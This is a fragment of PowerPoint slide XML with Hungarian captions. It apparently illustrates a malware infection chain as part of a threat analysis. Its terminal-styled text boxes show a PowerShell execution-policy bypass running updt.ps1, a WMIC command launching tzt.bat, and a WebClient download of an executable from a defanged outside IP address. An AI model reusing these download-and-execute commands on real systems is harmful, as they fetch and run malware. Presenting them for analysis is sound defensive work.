                  <a:rPr lang="en-US" sz="1800" kern="0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Bypass C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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\\updt.ps1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5888ECC7-1011-FE3D-9386-D8113D7B07A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862260" y="2244337"/>
              <a:ext cx="6098468" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Administrator: C:\\Windows\system32\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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B3C9496-75FB-AD6D-11EB-B76FE19F7AF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="896682" y="8169188"/>
            <a:ext cx="16459200" cy="1203412"/>
            <a:chOff x="914400" y="2120366"/>
            <a:chExt cx="16459200" cy="120341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31E549D-C08B-2A07-5E87-66C48909201C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="914400" y="2120366"/>
              <a:ext cx="16459200" cy="1203412"/>
              <a:chOff x="9783551" y="1103018"/>
              <a:chExt cx="16459200" cy="1203412"/>
            </a:xfrm>
          </p:grpSpPr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F0DDD000-7048-AD75-E840-442A0AD7FEA2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9783551" y="1103018"/>
                <a:ext cx="16459200" cy="1203412"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 6307"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="19" name="Graphic 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68466CA0-BCB8-8E68-A42C-39CEE42B40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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10126322" y="1300398"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5E3251-F7A5-7E6B-F20E-9E57F216B4C9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9928226" y="1730867"/>
                <a:ext cx="16134415" cy="444439"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" dirty="0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WMIC process call create ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" dirty="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" dirty="0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\\tzt.bat”</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495CE444-69E1-9203-59CF-84CCD30B1B8D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862260" y="2244337"/>
              <a:ext cx="6098468" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Administrator: C:\\Windows\system32\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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DAA71A9-DF13-600E-5CF2-20C315E0D593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="4640849"/>
            <a:ext cx="16459200" cy="1221223"/>
            <a:chOff x="914400" y="4657063"/>
            <a:chExt cx="16459200" cy="122122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4D30C8F-7082-331C-B1A5-1CDF3A52A348}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="914400" y="4657063"/>
              <a:ext cx="16459200" cy="1221223"/>
              <a:chOff x="914400" y="2153521"/>
              <a:chExt cx="16459200" cy="1221223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E13CFA14-D178-AB9C-1477-83D473FCD3C4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="914400" y="2153521"/>
                <a:ext cx="16459200" cy="1221223"/>
                <a:chOff x="9783551" y="1136173"/>
                <a:chExt cx="16459200" cy="1221223"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="30" name="Rounded Rectangle 29">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A0A37E0-0051-07C3-C96A-ACC132ECAD6B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9783551" y="1136173"/>
                  <a:ext cx="16459200" cy="1221223"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 6307"/>
                  </a:avLst>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="4274CC"/>
                </a:solidFill>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="424D56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SK"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="33" name="Rectangle: Rounded Corners 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70CF12DE-F173-F6BA-713B-D6FB109CFF8F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9928226" y="1818603"/>
                  <a:ext cx="16134415" cy="227813"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="1079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defTabSz="1811382">
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>&gt;&gt; $cl = New-Object </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>System.Net.WebClient</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t/>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>&gt;&gt; $</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>cl.DownloadFile</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>(“</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>hxxp</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>://80.66.75[.]47/</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>Dxccaejs.exe</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>”, ”C:?\</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>ProgramData</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>\\</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>tzt.bat</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>”)</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{120DA972-352A-0267-85F1-A04C17A82D83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1605963" y="2221004"/>
                <a:ext cx="6098468" cy="467642"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln cap="rnd">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="63500">
                  <a:schemeClr val="accent4">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:glow>
                <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="D80B55"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="1371600"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>Administrator: Windows PowerShell</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp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2627E062-CA14-1AF2-C16B-EC0417F8C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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1191666" y="4792146"/>
              <a:ext cx="414297" cy="310722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90922B9D-8856-9CF4-298F-90D53EB94D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914399" y="2147117"/>
            <a:ext cx="164414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9449" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>szkript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> létrehozása</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProgramData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\updt.ps1”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4332188-079F-D41A-A784-1C4EA7DECBDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4234954"/>
            <a:ext cx="165243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9449" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProgramData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\updt.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tartalma</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BBC5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47E5370-66F7-9DAD-6A4C-DD65E9561B41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914399" y="6086820"/>
            <a:ext cx="164414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9449" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProgramData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\updt.ps1” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>futtatása </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tzt.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-ként lett letöltve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BBC5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567EAEF-2D5B-C6FC-BD0B-5EAA42417D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914399" y="7782292"/>
            <a:ext cx="164414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9449" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProgramData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\updt.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> futtatása</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tzt.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-ként letöltve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BBC5"/>
              </a:solidFill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5DBAA22-E967-C88F-BB33-484496A778B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="-3652495"/>
            <a:ext cx="16459200" cy="3185521"/>
            <a:chOff x="914400" y="2120365"/>
            <a:chExt cx="16459200" cy="3185521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855A94B4-AE43-069B-D5E2-C163EA7544B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
